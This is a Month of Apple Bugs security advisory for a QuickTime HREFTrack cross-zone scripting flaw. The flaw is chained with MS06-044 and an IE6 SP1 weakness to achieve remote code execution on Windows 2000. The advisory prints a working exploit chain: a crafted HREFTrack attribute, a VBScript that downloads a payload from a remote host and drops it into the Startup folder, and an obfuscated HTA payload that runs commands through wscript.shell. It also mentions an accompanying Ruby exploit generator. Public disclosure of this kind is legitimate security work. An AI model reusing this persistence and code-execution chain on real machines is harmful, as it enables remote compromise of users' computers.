BACK

CREDIT

POC or EXPLOIT

REFERENCES


Nick Nolte about Quicktime: 'Pimp pwnage.'

Artwork by GC.

Summary

A month ago, a vulnerability in QuickTime was exploited to spread a worm in MySpace. The vulnerability was first published by pdp. In his article, pdp describes how HREFTrack attribute in .mov files can be used for malicious scripting. The MySpace worm abused this vulnerability in a cross-site scripting attack vector.

This MoAB issue shows that this vulnerability can also be used in a cross-zone scripting attack which could allow, in combination with other vulnerabilities, to remotely execute arbitrary code on the user's machine, as well as disclosure of the filesystem contents.

Affected versions

This issue has been successfully exploited in QuickTime™ Version 7.1.3. Previous versions should be vulnerable as well.

Proof of concept, exploit or instructions to reproduce

Requires a working Ruby interpreter. If 'serve' argument is passed, it will launch both a web server (via Webrick) and a non-standard (aka quick hack) FTP server. The exploit uses Microsoft Text Driver ADODB connection which requires an anonymous FTP login to the exploit location, for an unknown reason. The FTP hack hasn't been fully tested and thus it's been removed from the public version. It will generate the files for the location of your choice:

$ ruby MOAB-03-01-2007.rb
++ Preparing files...
++ Script file....
++ HTA payload file....
-- Terminating: 761
			

Modify REMOTE_HOST, REMOTE_URL and HTA_PAYLOAD as necessary. Note that you still need to provide a MOV file with the crafted HREFTrack attribute. See notes below for information about how to do it.

Debugging information

Not necessary for this issue. See notes below and the proof of concept provided.

Notes

Exploitation conditions

We are using an already patched vulnerability on Windows 2000 SP4 to demonstrate one of the possible attack vectors to abuse this issue.

MS06-044 is a vulnerability in the Microsoft Management Console (MMC), which can be easily exploited for remote code execution in the Internet Zone of IE5 on Win2k SP4. However, according to Microsoft’s security bulletin, it cannot be exploited in the Internet Zone of IE6 SP1 because: "by default Internet Explorer 6 Service Pack 1 blocks local file access from URLs in the Internet Zone"". We will use this QuickTime HREFTrack vulnerability to refute that claim.

HD Moore, who discovered the MMC vulnerability, published an exploit for IE5. In his exploit, he uses the Execute function of the Shell.Application ActiveX object to run code. This ActiveX was disabled in IE6 SP1. Instead, We’ll use an older code execution exploit provided by http-equiv and Michael Evanchik. This code uses the Microsoft Text Driver to retrieve a script that will be saved as an HTA file on the target user’s startup folder and will be executed on the next login.

The problem with this exploit code is that it’s too long for the HREFTrack attribute. Therefore, We’ll use a new cross-zone vulnerability in IE: Internet Explorer 6.0 SP1 allows to run remote scripts loaded from local-zone in the context of local-zone. Although this might be considered a minor issue, it will allow us to refer a remote script file from local-zone, and use the short reference script in the HREFTrack attribute.

The HREFTrack attribute:

A<res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript src="http://remote/q.vbs"
language="vbscript"%3E%3C/script%3E%3C%21--//|> T<>
			

The remote script (q.vbs):

on error resume next
Set c = CreateObject("ADODB.Connection")
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};Dbq=http://remote/;Extensions=txt;"
c.Open co
set rs =CreateObject("ADODB.Recordset")
rs.Open "SELECT * from qtpoc.txt", c
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\poc.hta", adPersistXML
rs.close
c.close
window.close
			

The HTA payload (qtpoc.txt):

<script>q='%77%73%63%72%69%70';</script>
<script>q+='%74%2E%73%68%65%6C%6C';</script>
<script>a=new ActiveXObject(unescape(q));</script>
<script>a.run('%windir%\\System32\\calc.exe');</script>
<script>window.close();</script>
			

We have combined the following vulnerabilities in order to conduct remote code execution on Win2k SP4 with IE6 SP1:

1)      HREFTrack cross-zone scripting vulnerability
        -> Refer to local resources from remote.
2)      MS06-044 - Microsoft Management Console cross-site scripting vulnerability
        -> Inject script in local-zone.
3)      IE6 SP1 cross-zone scripting vulnerability
        -> Load script from remote in local zone context.
4)      ADODB.Recordset save adPersistXML vulnerability
        -> Save the HTA file on the startup folder of the victim.
			
Workaround or temporary solution

Apple has released a patch to address the MySpace worm. This patch is limited to Microsoft Internet Explorer users, and it was only published on MySpace.com (?), instead of an official release on Apple.com. We have tested this patch on several machines, and it seems to have no effect at all. With this patch applied, we can still refer to local resources.

In addition, pdp has already published another vulnerability in QuickTime’s .QTL files which can be exploited in the same way as the HREFTrack vulnerability in order to conduct remote code execution.

Thus, until real patches are available, we recommend uninstalling Quicktime or simply live with the feeling of being a potential target for pwnage.